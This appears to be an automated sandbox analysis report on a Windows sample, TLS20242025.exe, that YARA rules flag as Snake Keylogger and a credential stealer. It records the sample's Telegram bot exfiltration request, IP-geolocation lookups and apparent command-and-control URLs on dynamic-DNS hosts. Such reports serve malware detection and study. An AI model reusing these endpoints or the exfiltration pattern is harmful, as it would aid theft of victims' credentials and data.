Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 0105F45Dh |
2_2_0105F2C0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 0105F45Dh |
2_2_0105F52F |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 0105F45Dh |
2_2_0105F4AC |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 0105FC19h |
2_2_0105F974 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067D31E0h |
2_2_067D2DC8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DE501h |
2_2_067DE258 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067D0D0Dh |
2_2_067D0B30 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067D1697h |
2_2_067D0B30 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067D2C19h |
2_2_067D2968 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DE0A9h |
2_2_067DDE00 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DE959h |
2_2_067DE6B0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DF209h |
2_2_067DEF60 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DCF49h |
2_2_067DCCA0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DD7F9h |
2_2_067DD550 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067D31E0h |
2_2_067D2DB8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DEDB1h |
2_2_067DEB08 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DF661h |
2_2_067DF3B8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
2_2_067D0040 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DFAB9h |
2_2_067DF810 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DD3A1h |
2_2_067DD0F8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067D31E0h |
2_2_067D310E |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 4x nop then jmp 067DDC51h |
2_2_067DD9A8 |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20and%20Time:%2026/09/2024%20/%2020:05:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20123716%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://aborters.duckdns.org:8081 |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://anotherarmy.dns.army:8081 |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org |
Source: TLS20242025.exe, 00000002.00000002.4583576880.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/ |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
String found in binary or memory: http://checkip.dyndns.org/q |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://varders.kozow.com:8081 |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:123716%0D%0ADate%20a |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=en |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002C98000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enP |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CA2000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://chrome.google.com/webstore?hl=enlB |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B60000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/ |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33 |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002B8A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: TLS20242025.exe, 00000002.00000002.4588181134.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4588181134.0000000003B31000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD8000.00000004.00000800.00020000.00000000.sdmp, TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/ |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/P |
Source: TLS20242025.exe, 00000002.00000002.4585576245.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.office.com/lB |
Source: unknown |
Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49734 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49720 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49726 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49720 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49718 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49713 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49726 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49718 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49713 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a92840.3.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a92840.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 0.2.TLS20242025.exe.3a4fe10.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 0.2.TLS20242025.exe.3959d70.4.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: TLS20242025.exe PID: 5748, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: TLS20242025.exe PID: 5576, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105C147 |
2_2_0105C147 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105A088 |
2_2_0105A088 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_01055362 |
2_2_01055362 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105D278 |
2_2_0105D278 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105C46A |
2_2_0105C46A |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105C738 |
2_2_0105C738 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105E988 |
2_2_0105E988 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_010569A0 |
2_2_010569A0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105CA08 |
2_2_0105CA08 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105CCD8 |
2_2_0105CCD8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105CFAA |
2_2_0105CFAA |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_01056FC8 |
2_2_01056FC8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_01053E09 |
2_2_01053E09 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105F974 |
2_2_0105F974 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_0105E97A |
2_2_0105E97A |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_010529E0 |
2_2_010529E0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D1E80 |
2_2_067D1E80 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D17A0 |
2_2_067D17A0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DFC68 |
2_2_067DFC68 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D9C18 |
2_2_067D9C18 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D9548 |
2_2_067D9548 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DE258 |
2_2_067DE258 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D0B30 |
2_2_067D0B30 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D5028 |
2_2_067D5028 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D2968 |
2_2_067D2968 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D1E70 |
2_2_067D1E70 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DDE00 |
2_2_067DDE00 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DE6B0 |
2_2_067DE6B0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DE6AF |
2_2_067DE6AF |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DE6A0 |
2_2_067DE6A0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DEF60 |
2_2_067DEF60 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D178F |
2_2_067D178F |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DCCA0 |
2_2_067DCCA0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DCC8F |
2_2_067DCC8F |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DD550 |
2_2_067DD550 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DD540 |
2_2_067DD540 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DDDFF |
2_2_067DDDFF |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DDDF1 |
2_2_067DDDF1 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DE24B |
2_2_067DE24B |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DEAF8 |
2_2_067DEAF8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D0B20 |
2_2_067D0B20 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DEB08 |
2_2_067DEB08 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DF3B8 |
2_2_067DF3B8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DF3A8 |
2_2_067DF3A8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D8BA0 |
2_2_067D8BA0 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D0040 |
2_2_067D0040 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D003F |
2_2_067D003F |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D5027 |
2_2_067D5027 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DF810 |
2_2_067DF810 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D0007 |
2_2_067D0007 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DF803 |
2_2_067DF803 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DD0F8 |
2_2_067DD0F8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067D295F |
2_2_067D295F |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DD9A8 |
2_2_067DD9A8 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DD9A7 |
2_2_067DD9A7 |
Source: C:\Users\user\Desktop\TLS20242025.exe |
Code function: 2_2_067DD999 |
2_2_067DD999 |
Source: TLS20242025.exe, 00000000.00000000.2128299617.0000000000532000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585821019.00000000038E1000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4583281992.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameclr.dllT vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4587810220.0000000005200000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4585419626.000000000297D000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000000.00000002.4587170944.00000000050E0000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameExample.dll0 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000002.00000002.4583199335.0000000000402000.00000040.00000400.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameRemington.exe4 vs TLS20242025.exe |
Source: TLS20242025.exe, 00000002.00000002.4583338825.00000000009A7000.00000004.00000010.00020000.00000000.sdmp |
Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TLS20242025.exe |
Source: TLS20242025.exe |
Binary or memory string: OriginalFilenamePvI.exe( vs TLS20242025.exe |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23 |
Source: 2.2.TLS20242025.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
Source: 0.2.TLS20242025.exe.3a4fe10.2.unpack, type: UNPACKEDPE |
Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/ |
